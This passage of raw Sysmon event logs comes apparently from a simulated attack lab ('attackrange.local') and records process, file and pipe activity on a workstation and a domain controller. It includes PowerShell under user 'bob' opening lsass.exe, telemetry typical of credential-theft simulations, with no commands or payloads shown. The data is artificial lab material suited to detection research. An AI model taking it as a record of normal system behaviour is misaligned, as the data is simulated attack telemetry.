08:10:26.935{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810871Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.935{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810870Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.935{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810869Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.935{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810868Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.935{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810867Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.935{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810866Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.935{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810865Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.935{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810864Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.935{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F8F2-60EB-F579-00000000D001}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810863Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.935{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F8F2-60EB-F579-00000000D001}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810862Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.923{0C1E0330-F8F2-60EB-F579-00000000D001}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810861Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.920{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28EE5A0B424DF2B69549C71A295C3833,SHA256=08A9DCCB5B9AD8172826BA952F6A0C5B4F7C4147F20EC090F612DF107A75C3DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810860Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.920{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F1EAC6A0C728A13891793A0A5D129A80,SHA256=FAB168DB9C118CA52F25C5B98BF974C6E9157CE2C746306D97B88E8DF473B09E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055567Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.957{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055566Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.957{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x80000000000000001055565Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:10:26.887{466BC892-F8F2-60EB-107E-00000000CF01}10188\PSHost.132705510262988449.10188.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001055564Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.871{466BC892-F8F2-60EB-107E-00000000CF01}10188ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_0vtx2ay0.bug.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055563Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.871{466BC892-F8F2-60EB-107E-00000000CF01}10188ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_v25znm0x.54b.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001055562Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.824{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_v25znm0x.54b.ps12021-07-12 08:10:26.824 10341000x80000000000000001055561Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.739{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055560Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.688{466BC892-F8F2-60EB-107E-00000000CF01}101888996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055559Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.688{466BC892-F8F2-60EB-107E-00000000CF01}101888996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055558Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.688{466BC892-F8F2-60EB-107E-00000000CF01}101888996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055557Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.688{466BC892-F8F2-60EB-107E-00000000CF01}101888996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055556Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.688{466BC892-F8F2-60EB-107E-00000000CF01}101888996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+609de|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055555Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.688{466BC892-F8F2-60EB-107E-00000000CF01}101888996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055554Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.688{466BC892-F8F2-60EB-107E-00000000CF01}101888996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+609cc|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055553Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.688{466BC892-F8F2-60EB-107E-00000000CF01}10188ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RFf79f181.TMPMD5=2C0FD6F951FA1D507F7B5C46BB749BFE,SHA256=500857DA7D87C376CB267338351A1D967C9EA82A3709662A2377A28AD4E79CBF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055552Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:26.641{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055551Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 